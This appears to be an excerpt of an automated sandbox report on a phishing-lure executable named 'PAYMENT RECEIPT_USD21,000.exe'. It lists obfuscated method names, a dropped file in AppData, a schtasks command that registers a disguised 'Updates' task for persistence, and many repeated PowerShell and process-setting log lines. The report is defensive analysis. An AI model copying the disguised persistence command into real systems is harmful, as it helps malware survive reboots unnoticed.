                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, xKCmdn4pHsdy1wvAJp.csHigh entropy of concatenated method names: 'xyHdQikDqR', 'Y4UdxGrElt', 'WpGdMAHH4Y', 'jwgdZAqoGq', 'joCdsBsbne', 'tfQd8NEE8Y', 'EPQ7Zxv7pgMhIWeTxs', 'NCM7BQHUFPPChoOXy0', 'MonddSaSnN', 'Ahtd2xqQrx'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, GuWZlZoVyTGaP4DC91.csHigh entropy of concatenated method names: 'yr0rPZ7war', 'qCDrHV0nG2', 'A1Er7Isk5c', 'zRfr5f8R3H', 'pWQr15UB8Y', 'kuIrVHtBrB', 'AZArcnIrnv', 'gsYrAWug18', 'CGDrqDrj3N', 'w7irWqIvS2'
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeFile created: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
